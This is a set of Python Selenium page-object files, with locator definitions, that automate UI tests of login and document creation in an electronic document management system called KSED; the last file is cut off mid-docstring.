    fileUpload4 = WebElement(xpath=KSEDLocators.fileUpload4)  # upload a file in an assignment
    files = WebElement(xpath=KSEDLocators.files)  # "Select files"
    show = WebElement(xpath=KSEDLocators.show)  # show the common card
    dropBtn = WebElement(xpath=KSEDLocators.dropBtn)  # drop-down list button
    dropBtn_2 = WebElement(xpath=KSEDLocators.dropBtn_2)  # drop-down list button
    resultSogl = WebElement(xpath=KSEDLocators.resultSogl)  # approval result
    show_list = WebElement(xpath=KSEDLocators.show_list)  # show as a list
    btnPrint = WebElement(xpath=KSEDLocators.btnPrint)  # print button in the attachment preview form
    soglasovanieWkladka = WebElement(xpath=KSEDLocators.soglasovanieWkladka)  # "Approval" tab
    soglasovanieWkladka2 = WebElement(xpath=KSEDLocators.soglasovanieWkladka2)  # "Approval" tab
    createRuleBtn = WebElement(xpath=KSEDLocators.createRuleBtn)  # "Create route" button
    createRuleIndivid = WebElement(xpath=KSEDLocators.createRuleIndivid)  # "Individual route"
    addEtap = WebElement(xpath=KSEDLocators.addEtap)  # "Add stage" button
    tipeEtap = WebElement(xpath=KSEDLocators.tipeEtap)  # "Stage kind"
    soglasuychie = WebElement(xpath=KSEDLocators.soglasuychie)  # "Approvers"
    btnOKformSogl = WebElement(xpath=KSEDLocators.btnOKformSogl)  # "OK" button on the add-approval-stage form
    punkti = WebElement(xpath=KSEDLocators.punkti)  # "Items" tab
    punktiBtn = WebElement(xpath=KSEDLocators.punktiBtn)  # "Items" button
    punktPoruch = WebElement(xpath=KSEDLocators.punktPoruch)  # item/assignment
    textPoruch = WebElement(xpath=KSEDLocators.textPoruch)  # assignment text
    tipPoruch = WebElement(xpath=KSEDLocators.tipPoruch)  # assignment type — NOTE(review): re-assigned again in the ASSIGNMENT section below
    otvetstv_ispolnVpunktah = WebElement(xpath=KSEDLocators.otvetstv_ispolnVpunktah)  # responsible executor in the document card items
    srokIspoln = WebElement(xpath=KSEDLocators.srokIspoln)  # execution deadline (middle value)
    btnOKform = WebElement(xpath=KSEDLocators.btnOKform)  # OK button on the form
    sendFor_approval = WebElement(xpath=KSEDLocators.sendFor_approval)  # "Send for approval" action
    sendFor_podpis = WebElement(xpath=KSEDLocators.sendFor_podpis)  # "Send for signing" action
    sendFor_execution = WebElement(xpath=KSEDLocators.sendFor_execution)  # "Send for execution" action
    btnOKnaprNaIspoln = WebElement(xpath=KSEDLocators.btnOKnaprNaIspoln)  # "OK" button on the "Send for execution" confirmation form
    confirm = WebElement(xpath=KSEDLocators.confirm)  # approval confirmation
    confirm2 = WebElement(xpath=KSEDLocators.confirm2)  # approval confirmation
    confirm_3 = WebElement(xpath=KSEDLocators.confirm_3)  # approval confirmation
    confirm_4 = WebElement(xpath=KSEDLocators.confirm_4)  # approval confirmation
    confirm_5 = WebElement(xpath=KSEDLocators.confirm_5)  # selection confirmation
    confirm_6 = WebElement(xpath=KSEDLocators.confirm_6)  # selection confirmation
    confirm_7 = WebElement(xpath=KSEDLocators.confirm_7)  # selection confirmation
    confirm_8 = WebElement(xpath=KSEDLocators.confirm_8)  # selection confirmation
    confirm_9 = WebElement(xpath=KSEDLocators.confirm_9)  # selection confirmation
    btnTree = WebElement(xpath=KSEDLocators.btnTree)  # "..." button
    btnSelection3 = WebElement(xpath=KSEDLocators.btnSelection3)  # choice button no. 3
    btnSelection_3 = WebElement(xpath=KSEDLocators.btnSelection_3)  # choice button no. 3
    btnSelection_4 = WebElement(xpath=KSEDLocators.btnSelection_4)  # choice button no. 3 (per source comment)
    btnSelection_1 = WebElement(xpath=KSEDLocators.btnSelection_1)  # choice button no. 1
    btnSelection1 = WebElement(xpath=KSEDLocators.btnSelection1)  # choice button no. 1
    btnSelection_5 = WebElement(xpath=KSEDLocators.btnSelection_5)  # choice button no. 27 (per source comment)
    status_Doc = WebElement(xpath=KSEDLocators.status_Doc)  # document status in the "Basic information" tab
    status_Doc_1 = WebElement(xpath=KSEDLocators.status_Doc_1)  # document status in the "Basic information" tab
    # "Send report"
    actionSendAllere = WebElement(xpath=KSEDLocators.actionSendAllere)  # "Send report" action
    btnSend = WebElement(xpath=KSEDLocators.btnSend)  # "Send" button
    textAllur = WebElement(xpath=KSEDLocators.textAllur)  # "Report text" text field
    btnAddSvyz = WebElement(xpath=KSEDLocators.btnAddSvyz)  # add-relation button "..."
    searchDoc = WebElement(xpath=KSEDLocators.searchDoc)  # search input in the selection form
    oneListEl = WebElement(xpath=KSEDLocators.oneListEl)  # first element in the directory list
    btnOK = WebElement(xpath=KSEDLocators.btnOK)  # "OK" button in the selection form
    # (approval panel)
    APPROVED_button = WebElement(xpath=KSEDLocators.APPROVED_button)  # "Approve" button
    APPROVED_WITH_REMARK_button = WebElement(xpath=KSEDLocators.APPROVED_WITH_REMARK_button)  # "Approve with comments" button
    REJECTED_button = WebElement(xpath=KSEDLocators.REJECTED_button)  # "Reject" button
    internal_approval = WebElement(xpath=KSEDLocators.internal_approval)  # "Internal approval" button
    prop_bpm_comment = WebElement(xpath=KSEDLocators.prop_bpm_comment)  # comment field
    prop_bpm_comment_sogl = WebElement(xpath=KSEDLocators.prop_bpm_comment)  # comment field — NOTE(review): reuses the prop_bpm_comment locator; confirm this is intentional
    apply_button_button = WebElement(xpath=KSEDLocators.apply_button_button)  # "OK" button when issuing an approval decision
    apply_button_button2 = WebElement(xpath=KSEDLocators.apply_button_button2)  # "OK" button when issuing an approval decision
    SIGNED_button = WebElement(xpath=KSEDLocators.SIGNED_button)  # "Sign" button
    # # PROTOCOL
    # # (document creation form)
    # addEl = WebElement(xpath=KSEDLocators.addEl)  # document kind (working-group meeting protocol)
    # addEl2 = WebElement(xpath=KSEDLocators.addEl2)  # document kind "Internal memo"
    # ADMINISTRATIVE DOCUMENT (RD)
    # (document creation form)
    addEl = WebElement(xpath=KSEDLocators.addEl)  # document kind (working-group meeting protocol)
    addEl2 = WebElement(xpath=KSEDLocators.addEl2)  # document kind "Internal memo"
    preambula = WebElement(xpath=KSEDLocators.preambula)  # preamble
    obcontrol = WebElement(xpath=KSEDLocators.obcontrol)  # general control
    wid_doc = WebElement(xpath=KSEDLocators.wid_doc)  # document kind (in RD)
    wid_doc_rasp = WebElement(xpath=KSEDLocators.wid_doc_rasp)  # RD document kind (Directive)
    addPunkt = WebElement(xpath=KSEDLocators.addPunkt)  # "Add item" button
    textPunktaRD = WebElement(name=KSEDLocators.textPunktaRD)  # RD item text
    otvetstv_ispolnVpunktahRD = WebElement(xpath=KSEDLocators.otvetstv_ispolnVpunktahRD)  # responsible executor in an RD item
    rassilka = WebElement(xpath=KSEDLocators.rassilka)  # "Distribution" tab
    btnVipolnit = WebElement(xpath=KSEDLocators.btnVipolnit)  # "Execute..." button
    punktBtnVipolnit = WebElement(xpath=KSEDLocators.punktBtnVipolnit)  # "Create and fill"
    # PROTOCOL
    # (document creation form)
    date = WebElement(xpath=KSEDLocators.date)  # meeting date
    category = WebElement(xpath=KSEDLocators.category)  # category
    Chairman = WebElement(xpath=KSEDLocators.Chairman)  # chairman
    Secretary = WebElement(xpath=KSEDLocators.Secretary)  # secretary
    person_present = WebElement(xpath=KSEDLocators.person_present)  # attendees
    # REGISTRY
    # (document creation form)
    vid_reestra = WebElement(xpath=KSEDLocators.vid_reestra)  # registry kind
    vid_reestraPR = WebElement(xpath=KSEDLocators.vid_reestraPR)  # registry kind (transfer for registration)
    vid_reestraPP = WebElement(xpath=KSEDLocators.vid_reestraPP)  # registry kind (acceptance/transfer)
    btnCreateChern = WebElement(xpath=KSEDLocators.btnCreateChern)  # "Create draft" button
    btnCreateSend = WebElement(xpath=KSEDLocators.btnCreateSend)  # "Create and send" button
    inpDoc = WebElement(xpath=KSEDLocators.inpDoc)  # "Documents" field
    poluchatel = WebElement(xpath=KSEDLocators.poluchatel)  # "Recipient" field
    # INTERNAL MEMO
    # (document creation form)
    adresati = WebElement(xpath=KSEDLocators.adresati)  # addressees
    podpisanti = WebElement(xpath=KSEDLocators.podpisanti)  # signers
    # ARBITRARY DOCUMENT
    # (document creation form)
    prorabotka = WebElement(xpath=KSEDLocators.prorabotka)  # elaboration
    chBprorab = WebElement(xpath=KSEDLocators.chBprorab)  # elaboration checkbox
    normokontrol = WebElement(xpath=KSEDLocators.normokontrol)  # standards control
    chBnorm = WebElement(xpath=KSEDLocators.chBnorm)  # standards-control checkbox
    soglasovanie = WebElement(xpath=KSEDLocators.soglasovanie)  # approval
    podpisanie = WebElement(xpath=KSEDLocators.podpisanie)  # signing
    utverzhdenie = WebElement(xpath=KSEDLocators.utverzhdenie)  # endorsement
    oznakomlenie = WebElement(xpath=KSEDLocators.oznakomlenie)  # familiarization
    # ASSIGNMENT
    # (document creation form)
    tipPoruch = WebElement(xpath=KSEDLocators.tipPoruch)  # assignment type — NOTE(review): duplicate of the definition above
    text_poruch = WebElement(name=KSEDLocators.text_poruch)  # assignment text
    otvetstv_ispoln = WebElement(xpath=KSEDLocators.otvetstv_ispoln)  # responsible executor
    # INCOMING CORRESPONDENCE PACKAGE
    # INCOMING DOCUMENT
    # (document creation form)
    ishNumber = WebElement(name=KSEDLocators.ishNumber)  # outgoing number
    dateIS = WebElement(xpath=KSEDLocators.dateIS)  # outgoing date
    # OUTGOING DOCUMENT
    # (document creation form)
    osnovPodpis = WebElement(name=KSEDLocators.osnovPodpis)  # signing basis
    korrespondentISH = WebElement(xpath=KSEDLocators.korrespondentISH)  # correspondent
    clickNull = WebElement(xpath=KSEDLocators.clickNull)  # click outside the attributes
    # Report forms
    # My search queries
    listChange = WebElement(xpath=KSEDLocators.listChange)  # drop-down list
    listChangeSZ = WebElement(xpath=KSEDLocators.listChangeSZ)  # drop-down list — internal memo
    listChangeRD = WebElement(xpath=KSEDLocators.listChangeRD)  # drop-down list — RD
    butSave = WebElement(xpath=KSEDLocators.butSave)  # save button
    nameZap = WebElement(xpath=KSEDLocators.nameZap)  # query name
    zaprosToDel = WebElement(xpath=KSEDLocators.zaprosToDel)  # the created query
    butDel = WebElement(xpath=KSEDLocators.butDel)  # delete button
    butRed = WebElement(xpath=KSEDLocators.butRed)  # edit button
    butDelAc = WebElement(xpath=KSEDLocators.butDelAc)  # delete-confirmation button
    butAct = WebElement(xpath=KSEDLocators.butAct)  # "Actions with selected" button
    butAct_2 = WebElement(xpath=KSEDLocators.butAct_2)  # "Actions with selected" button
    butExp = WebElement(xpath=KSEDLocators.butExp)  # export button
    butExp_2 = WebElement(xpath=KSEDLocators.butExp_2)  # export button
    checkBoxFirst = WebElement(xpath=KSEDLocators.checkBoxFirst)  # first checkbox in the list
    butFavorite = WebElement(xpath=KSEDLocators.butFavorite)  # add-to-favorites button
    butOK = WebElement(xpath=KSEDLocators.butOK)  # OK button (add to favorites)
    butSelExp = WebElement(xpath=KSEDLocators.butSelExp)  # export-selected button
    # Approval card
    kurator = WebElement(xpath=KSEDLocators.kurator)  # curator
    viewSelecton = WebElement(xpath=KSEDLocators.viewSelecton)  # document kind
    viewLndSelecton = WebElement(xpath=KSEDLocators.viewLndSelecton)  # LND kind
    etcSelecton = WebElement(xpath=KSEDLocators.etcSelecton)  # document kind "Other"
    rdSelecton = WebElement(xpath=KSEDLocators.rdSelecton)  # document kind RD
    lndSelecton = WebElement(xpath=KSEDLocators.lndSelecton)  # document kind LND
    btnSelection4 = WebElement(xpath=KSEDLocators.btnSelection4)  # choice no. 4
    titleCS = WebElement(xpath=KSEDLocators.titleCS)  # title
    saveProject = WebElement(xpath=KSEDLocators.saveProject)  # save the draft
    proUpLevel = WebElement(xpath=KSEDLocators.proUpLevel)  # process
    levelFirst = WebElement(xpath=KSEDLocators.levelFirst)  # level 1
    levelFirst_1 = WebElement(xpath=KSEDLocators.levelFirst_1)  # level-1 input field
    navedenieSogl = WebElement(xpath=KSEDLocators.navedenieSogl)  # hover target for the created approval stage
    btnAddPerson = WebElement(xpath=KSEDLocators.btnAddPerson)  # button to add an employee to the approval stage
    btnAddPerson_2 = WebElement(xpath=KSEDLocators.btnAddPerson_2)  # button to add an employee to the approval stage
    createRuleTypical = WebElement(xpath=KSEDLocators.createRuleTypical)  # typical-route button
    btnContinium = WebElement(xpath=KSEDLocators.btnContinium)  # continue button
    reserchInput = WebElement(xpath=KSEDLocators.reserchInput)  # search input
    zamechSogl = WebElement(xpath=KSEDLocators.zamechSogl)  # approval status (per source comment; the name suggests "remarks" — verify)
    statusSogl = WebElement(xpath=KSEDLocators.statusSogl)  # approval status
    statusSogl_2 = WebElement(xpath=KSEDLocators.statusSogl_2)  # approval status
    rejectSogl = WebElement(xpath=KSEDLocators.rejectSogl)  # withdraw-from-approval button
    reasonReject = WebElement(xpath=KSEDLocators.reasonReject)  # rejection/withdrawal reason
    btnAction = WebElement(xpath=KSEDLocators.btnAction)  # actions button
    downLoadNewVersion = WebElement(xpath=KSEDLocators.downLoadNewVersion)  # upload a new version
    bntVersion = WebElement(xpath=KSEDLocators.bntVersion)  # version button
    btnInApp = WebElement(xpath=KSEDLocators.btnInApp)  # internal approval button
    btnInApp_2 = WebElement(xpath=KSEDLocators.btnInApp_2)  # internal approval button
    employeeForSogl = WebElement(xpath=KSEDLocators.employeeForSogl)  # "Employees" field
    btnRejectInnerSogl = WebElement(xpath=KSEDLocators.btnRejectInnerSogl)  # withdraw internal approval button
    statusInner = WebElement(xpath=KSEDLocators.statusInner)  # internal approval status
    statusInner_2 = WebElement(xpath=KSEDLocators.statusInner_2)  # internal approval status
    statusInner_3 = WebElement(xpath=KSEDLocators.statusInner_3)  # internal approval status
    statusInner_4 = WebElement(xpath=KSEDLocators.statusInner_4)  # internal approval status
    navedTaskInnerSogl = WebElement(xpath=KSEDLocators.navedTaskInnerSogl)  # hover target for the internal approval task
    btnRjctTaskInnerApp = WebElement(xpath=KSEDLocators.btnRjctTaskInnerApp)  # withdraw internal approval task button
    btnAddAtt = WebElement(xpath=KSEDLocators.btnAddAtt)  # add attachment button
    bntDocForRassmotr = WebElement(xpath=KSEDLocators.bntDocForRassmotr)  # add attachment "for consideration" button
    elmDownloaded = WebElement(xpath=KSEDLocators.elmDownloaded)  # the uploaded attachment
    btnAddComment = WebElement(xpath=KSEDLocators.btnAddComment)  # add remarks button
    areaComment = WebElement(xpath=KSEDLocators.areaComment)  # remarks textarea
    checkComment = WebElement(xpath=KSEDLocators.checkComment)  # comments check
    returnDecision = WebElement(xpath=KSEDLocators.returnDecision)  # withdraw decision button
    softDecision = WebElement(xpath=KSEDLocators.softDecision)  # soften decision button
    takeTasks = WebElement(xpath=KSEDLocators.takeTasks)  # take task button
    backTasks = WebElement(xpath=KSEDLocators.backTasks)  # return task button
    infoMassage = WebElement(xpath=KSEDLocators.infoMassage)  # information message
    butDelComment = WebElement(xpath=KSEDLocators.butDelComment)  # delete comments button
--- FILE SEPARATOR ---
#!/usr/bin/python3
# -*- encoding=utf8 -*-
import time, datetime
from selenium.webdriver.common.keys import Keys
from KSED.TestData.data import dataTest
from KSED.TestData.locators import KSEDLocators
from KSED.TestData.pages import MPages
import allure
def wait_page_loaded(driver, timeout=60, initial_sleep=2):
    """Block until the browser reports document.readyState == 'complete'.

    :param driver: WebDriver (anything exposing ``execute_script``).
    :param timeout: maximum seconds to poll before raising TimeoutError
                    (the original version looped forever on a stuck page).
    :param initial_sleep: grace period before the first poll (the original
                    always slept 2 s; kept as the default).
    :raises TimeoutError: if the page is not loaded within *timeout* seconds.
    """
    if initial_sleep:
        time.sleep(initial_sleep)
    deadline = time.monotonic() + timeout
    while not driver.execute_script("return document.readyState == 'complete';"):
        if time.monotonic() > deadline:
            raise TimeoutError('Page was not loaded in {0} seconds!'.format(timeout))
        time.sleep(0.1)
class KSEDCreatDocVH(MPages, dataTest, KSEDLocators):
    """Page object for creating an incoming ("VH") document in KSED."""

    def __init__(self, web_driver, uri=dataTest.baseURL):
        """Open the application base URL; page elements come from MPages."""
        super().__init__(web_driver, uri)
        # self.get(dataTest.baseURL)
        #
        # wait_page_loaded(self.w)

    @allure.step("Авторизация")
    def LogIN(self, username, password):
        """Log in with *username*/*password* and verify the workplace opened."""
        # wait = WebDriverWait(self.w, 10, poll_frequency=1,
        #                      ignored_exceptions=[NoSuchElementException,
        #                                          ElementNotVisibleException,
        #                                          ElementNotSelectableException])
        # page = Locator(self.w)
        self.username_text = username
        self.password_text = password
        self.LogIn_button.click()
        # wait_page_loaded(self._web_driver)
        self.user_menu.wait_to_be_clickable()
        # "АРМ" (workstation) must appear in the page title after login
        assert "АРМ" in self._web_driver.title

    # Document creation (open the creation form and fill in the attributes)
    def Creat(self,):
        """Create an incoming document: open the form, fill the attributes,
        press "Create" and verify the document card opened."""
        # wait = WebDriverWait(self.w, 10, poll_frequency=1,
        #                      ignored_exceptions=[NoSuchElementException,
        #                                          ElementNotVisibleException,
        #                                          ElementNotSelectableException])
        # page = Locator(self.w)
        # wait = WebDriverWait(self.w, 10)
        self.newDoc_button.click()
        self.vhDoc.click()
        # title must be the document-creation page
        assert "Страница создания документа" in self._web_driver.title
        # time.sleep(1)
        # Document attributes
        # Addressee
        self.adresat.scroll_to_element()
        self.adresat.wait_to_be_clickable()
        self.adresat.send_keys(u'Строганов' + Keys.RETURN)
        # Correspondent
        self.korrespondent.wait_to_be_clickable()
        self.korrespondent.send_keys(u'Логика' + Keys.RETURN)
        # Document category
        self.category_doc.wait_to_be_clickable()
        self.category_doc.send_keys(u'Открытый' + Keys.RETURN)
        # Outgoing number
        self.ishNumber.send_keys(u'123456')
        # Outgoing date (today, ddmmYYYY)
        dd = datetime.date.today().strftime('%d%m%Y')
        self.dateIS.send_keys(dd)
        # "Create" button
        self.btnCreateDoc.scroll_to_element()
        self.btnCreateDoc.wait_to_be_clickable()
        self.btnCreateDoc.click()
        # wait.until(EC.number_of_windows_to_be(2))
        wait_page_loaded(self._web_driver)
        # self.w.set_page_load_timeout(30)
        # time.sleep(20)
        #
        # wait.until(EC.title_is(self.w.title))
        self.mode.wait_to_be_clickable()
        # the document card title contains "Документ"
        assert "Документ" in self._web_driver.title
--- FILE SEPARATOR ---
#!/usr/bin/python3
# -*- encoding=utf8 -*-
import time
from selenium.webdriver.common.by import By
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.support import expected_conditions as EC
from selenium.webdriver.common.keys import Keys
from KSED.Pages.PageObject import Locator
from KSED.TestData.data import dataTest
from KSED.TestData.locators import KSEDLocators
import allure
def wait_page_loaded(driver, timeout=60, settle=2):
    """Poll the browser until document.readyState is 'complete'.

    :param driver: Selenium WebDriver (anything with execute_script).
    :param timeout: max seconds to poll; the original looped forever on a
        page that never finished loading, so raise TimeoutError instead.
    :param settle: initial pause in seconds so navigation can start before
        the first poll (the original hard-coded 2 s).
    :raises TimeoutError: if the page is not loaded within *timeout* seconds.
    """
    time.sleep(settle)
    deadline = time.monotonic() + timeout
    while not driver.execute_script("return document.readyState == 'complete';"):
        if time.monotonic() >= deadline:
            raise TimeoutError(
                "page did not reach readyState 'complete' within %s seconds" % timeout)
        time.sleep(0.1)
class KSEDCreatDocPVH(Locator, dataTest):
    """Page object: create an incoming packet ("пакет ВХ") document in KSED."""

    def __init__(self, web_driver, uri=''):
        # Open the application start page and wait for it to render.
        super().__init__(web_driver, uri)
        self.get(dataTest.baseURL)
        wait_page_loaded(self.w)

    @allure.step("Авторизация")
    def LogIN(self, username, password):
        """Authenticate and assert the workstation ("АРМ") page opened."""
        page = Locator(self.w)
        page.username_text = username
        # NOTE(review): prints the class-level locator attribute, presumably
        # left over from debugging — confirm it is still wanted.
        print(Locator.username_text)
        page.password_text = password
        page.LogIn_button.click()
        wait_page_loaded(self.w)
        assert "АРМ" in self.w.title

    # Document creation: open the creation form and fill in the attributes.
    def Creat(self,):
        """Create an incoming packet document and assert the document opened."""
        page = Locator(self.w)
        wait = WebDriverWait(self.w, 10)
        page.newDoc_button.click()
        page.paket_vh.click()
        assert "Страница создания документа" in self.w.title
        time.sleep(1)
        # Document attributes.
        # Correspondent (scrolled into view before typing).
        self.w.execute_script("arguments[0].scrollIntoView();", page.korrespondent)
        page.korrespondent.send_keys(u'Сибинтек' + Keys.RETURN)
        page.korrespondent.send_keys(Keys.RETURN)
        # Delivery method.
        page.sposob_dost.send_keys(u'КСЭД' + Keys.RETURN)
        # Addressee.
        page.adresat.send_keys(u'Строганов'+ Keys.RETURN)
        time.sleep(0.5)
        # "Create" button.
        self.w.execute_script("arguments[0].scrollIntoView();", page.btnCreateDoc)
        wait.until(EC.element_to_be_clickable((By.XPATH, KSEDLocators.btnCreateDoc)))
        page.btnCreateDoc.click()
        wait_page_loaded(self.w)
        time.sleep(2)
        assert "Документ" in self.w.title
--- FILE SEPARATOR ---
#!/usr/bin/python3
# -*- encoding=utf8 -*-
import time
from selenium.webdriver.common.by import By
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.support import expected_conditions as EC
from selenium.webdriver.common.keys import Keys
from KSED.TestData.data import dataTest
from KSED.TestData.locators import KSEDLocators
from KSED.TestData.pages import MPages
import allure
def wait_page_loaded(driver, timeout=60, settle=2):
    """Poll the browser until document.readyState is 'complete'.

    :param driver: Selenium WebDriver (anything with execute_script).
    :param timeout: max seconds to poll; the original looped forever on a
        page that never finished loading, so raise TimeoutError instead.
    :param settle: initial pause in seconds so navigation can start before
        the first poll (the original hard-coded 2 s).
    :raises TimeoutError: if the page is not loaded within *timeout* seconds.
    """
    time.sleep(settle)
    deadline = time.monotonic() + timeout
    while not driver.execute_script("return document.readyState == 'complete';"):
        if time.monotonic() >= deadline:
            raise TimeoutError(
                "page did not reach readyState 'complete' within %s seconds" % timeout)
        time.sleep(0.1)
class KSEDCreatDocPor(MPages, dataTest, KSEDLocators):
    """Page object: create an instruction ("поручение") document in KSED."""

    def __init__(self, web_driver, uri=dataTest.baseURL):
        """Initialise the page object on the application base URL."""
        super().__init__(web_driver, uri)

    @allure.step("Авторизация")
    def LogIN(self, username, password):
        """Authenticate and assert the workstation ("АРМ") page opened."""
        self.username_text = username
        self.password_text = password
        self.LogIn_button.click()
        self.wait_page_loaded()
        assert "АРМ" in self._web_driver.title

    # Document creation: open the creation form and fill in the attributes.
    def Creat(self,):
        """Create an instruction document and assert the document page opened."""
        wait = WebDriverWait(self._web_driver, 10)
        self.newDoc_button.click()
        self.poruchenie.click()
        self.wait_page_loaded()
        assert "Страница создания документа" in self._web_driver.title
        # Document attributes.
        self.wait_page_loaded()
        # Instruction type.
        wait.until(EC.element_to_be_clickable((By.XPATH, KSEDLocators.tipPoruch)))
        self.tipPoruch.wait_until_not_visible()
        self.tipPoruch.scroll_to_element()
        self.tipPoruch.send_keys(u'Для информации' + Keys.ENTER)
        # Document category.
        self.category_doc.wait_until_not_visible()
        self.category_doc.send_keys(u'Открытый' + Keys.RETURN)
        # Responsible executor.
        self.otvetstv_ispoln.scroll_to_element()
        self.otvetstv_ispoln.send_keys(u'Строганов' + Keys.RETURN)
        # "Create" button.
        self.btnCreateDoc.scroll_to_element()
        self.btnCreateDoc.wait_to_be_clickable()
        self.btnCreateDoc.click()
        self.wait_page_loaded(wait_for_xpath_to_disappear='//div[@id="confirm-edit-fields-form-container_mask"]')
        self.wait_page_loaded()
        assert "Документ" in self._web_driver.title

    # Save the document link to a file for the next test case.
    def LinkDocWFile(self):
        """Write the current document URL to Tests/linkDocPoruchenie.txt."""
        url = self._web_driver.current_url
        # FIX: use a context manager so the handle is closed even if
        # write() raises (the original open/close pair leaked on error).
        with open("Tests/linkDocPoruchenie.txt", "w") as my_file:
            my_file.write(str(url))
--- FILE SEPARATOR ---
#!/usr/bin/python3
# -*- encoding=utf8 -*-
import time
from selenium.webdriver import ActionChains
from selenium.webdriver.common.by import By
from selenium.webdriver.support.ui import WebDriverWait
from selenium.common.exceptions import *
from selenium.webdriver.support import expected_conditions as EC
from selenium.webdriver.common.keys import Keys
from KSED.Pages.PageObject import Locator
from KSED.TestData.data import dataTest
from KSED.TestData.locators import KSEDLocators
from KSED.TestData.pages import MPages
import allure
def wait_page_loaded(driver, timeout=60, settle=2):
    """Poll the browser until document.readyState is 'complete'.

    :param driver: Selenium WebDriver (anything with execute_script).
    :param timeout: max seconds to poll; the original looped forever on a
        page that never finished loading, so raise TimeoutError instead.
    :param settle: initial pause in seconds so navigation can start before
        the first poll (the original hard-coded 2 s).
    :raises TimeoutError: if the page is not loaded within *timeout* seconds.
    """
    time.sleep(settle)
    deadline = time.monotonic() + timeout
    while not driver.execute_script("return document.readyState == 'complete';"):
        if time.monotonic() >= deadline:
            raise TimeoutError(
                "page did not reach readyState 'complete' within %s seconds" % timeout)
        time.sleep(0.1)
class KSEDCreatDocReestr(Locator, dataTest, KSEDLocators, MPages):
    """Page object: create a registry ("реестр") document in KSED."""

    def __init__(self, web_driver, uri = dataTest.baseURL):
        """Initialise the page object; navigation happens via the base class."""
        super().__init__(web_driver, uri)

    @allure.step("Авторизация")
    def LogIN(self, username, password):
        """Authenticate and assert the workstation ("АРМ") page opened."""
        self.username_text = username
        print(Locator.username_text)
        self.password_text = password
        self.LogIn_button.click()
        wait_page_loaded(self._web_driver)
        assert "АРМ" in self._web_driver.title

    # Document creation: open the creation form and fill in the attributes.
    def Creat(self,):
        """Create a registry document and assert the document page opened."""
        # FIX: the original created a WebDriverWait with ignored_exceptions
        # and immediately shadowed it with a second plain one; keep a single
        # wait object.
        wait = WebDriverWait(self._web_driver, 10)
        actions = ActionChains(self._web_driver)
        self.newDoc_button.click()
        self.reestr.click()
        assert "Страница создания документа" in self._web_driver.title
        # Document attributes.
        # Registry kind.
        self.vid_reestra.click()
        self.vid_reestraPP.click()
        time.sleep(0.5)
        # Recipient.
        self.poluchatel.send_keys("Сибинтек"+Keys.RETURN)
        wait.until(EC.element_to_be_clickable((By.XPATH, KSEDLocators.poluchatel)))
        # Documents (looked up by barcode).
        # BUG FIX: was wait_to_be_clicable (missing "k"), which would raise
        # AttributeError — every other page object in this suite calls
        # wait_to_be_clickable.
        self.inpDoc.wait_to_be_clickable()
        self.inpDoc.send_keys(dataTest.BARCODE+Keys.RETURN)
        time.sleep(0.5)
        # "Create and send" button.
        wait.until(EC.element_to_be_clickable((By.XPATH, KSEDLocators.btnCreateSend)))
        actions.move_to_element(self.btnCreateSend).click().perform()
        wait_page_loaded(self._web_driver)
        time.sleep(2)
        assert "Документ" in self._web_driver.title
--- FILE SEPARATOR ---
#!/usr/bin/python3
# -*- encoding=utf8 -*-
import time, datetime
from selenium.webdriver import ActionChains
from page_objects import PageObject
from page_objects import PageElement
from page_objects import MultiPageElement
from selenium.webdriver.common.by import By
from selenium.webdriver.support.ui import Select, WebDriverWait
from selenium.common.exceptions import *
from selenium.webdriver.support import expected_conditions as EC
from selenium.webdriver.common.keys import Keys
from KSED.Pages.PageObject import Locator
from KSED.TestData.data import dataTest
from KSED.TestData.locators import KSEDLocators
import allure
def wait_page_loaded(driver, timeout=60, settle=2):
    """Poll the browser until document.readyState is 'complete'.

    :param driver: Selenium WebDriver (anything with execute_script).
    :param timeout: max seconds to poll; the original looped forever on a
        page that never finished loading, so raise TimeoutError instead.
    :param settle: initial pause in seconds so navigation can start before
        the first poll (the original hard-coded 2 s).
    :raises TimeoutError: if the page is not loaded within *timeout* seconds.
    """
    time.sleep(settle)
    deadline = time.monotonic() + timeout
    while not driver.execute_script("return document.readyState == 'complete';"):
        if time.monotonic() >= deadline:
            raise TimeoutError(
                "page did not reach readyState 'complete' within %s seconds" % timeout)
        time.sleep(0.1)
class KSEDsubordinate_doc(Locator, dataTest,KSEDLocators):
    """Page object: open a subordinate document from the expedition tree."""

    def __init__(self, web_driver, uri=''):
        # Open the application start page and wait for it to render.
        super().__init__(web_driver, uri)
        self.get(dataTest.baseURL)
        wait_page_loaded(self.w)

    @allure.step("Авторизация")
    def LogIN(self, username, password):
        """Authenticate and assert the workstation ("АРМ") page opened."""
        page = Locator(self.w)
        page.username_text = username
        # NOTE(review): debug print of the class-level locator attribute.
        print(Locator.username_text)
        page.password_text = password
        page.LogIn_button.click()
        wait_page_loaded(self.w)
        assert "АРМ" in self.w.title

    def subordinate_doc(self):
        """Expand the expedition node and open the first subordinate document."""
        # NOTE(review): 'wait' is created but never used in this method.
        wait = WebDriverWait(self.w, 1, poll_frequency=1,
                             ignored_exceptions=[NoSuchElementException,
                                                 ElementNotVisibleException,
                                                 ElementNotSelectableException])
        actions = ActionChains(self.w)
        page = Locator(self.w)
        self.w.execute_script("arguments[0].scrollIntoView();", page.expedition)
        page.expedition.click()
        time.sleep(0.5)
        # Second click slightly below the node — presumably needed for the
        # tree to register the expansion; confirm against the UI.
        actions.move_to_element(page.expedition).move_by_offset(0, 10).click().perform()
        time.sleep(1)
        # Walk every subordinate node and click it into view.
        for element in page.subordinate:
            self.w.execute_script("arguments[0].scrollIntoView();", element)
            element.click()
        # Open the single subordinate document from the list.
        self.w.execute_script("arguments[0].scrollIntoView();", page.oneSubordInList)
        page.oneSubordInList.click()
        wait_page_loaded(self.w)
        assert "Документ" in self.w.title
--- FILE SEPARATOR ---
#!/usr/bin/python3
# -*- encoding=utf8 -*-
import time, datetime
from selenium.webdriver.common.by import By
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.common.action_chains import ActionChains
from selenium.common.exceptions import *
from selenium.webdriver.support import expected_conditions as EC
from selenium.webdriver.common.keys import Keys
from KSED.Pages.PageObject import Locator
from KSED.TestData.data import dataTest
from KSED.TestData.locators import KSEDLocators
import allure
def wait_page_loaded(driver, timeout=60, settle=2):
    """Poll the browser until document.readyState is 'complete'.

    :param driver: Selenium WebDriver (anything with execute_script).
    :param timeout: max seconds to poll; the original looped forever on a
        page that never finished loading, so raise TimeoutError instead.
    :param settle: initial pause in seconds so navigation can start before
        the first poll (the original hard-coded 2 s).
    :raises TimeoutError: if the page is not loaded within *timeout* seconds.
    """
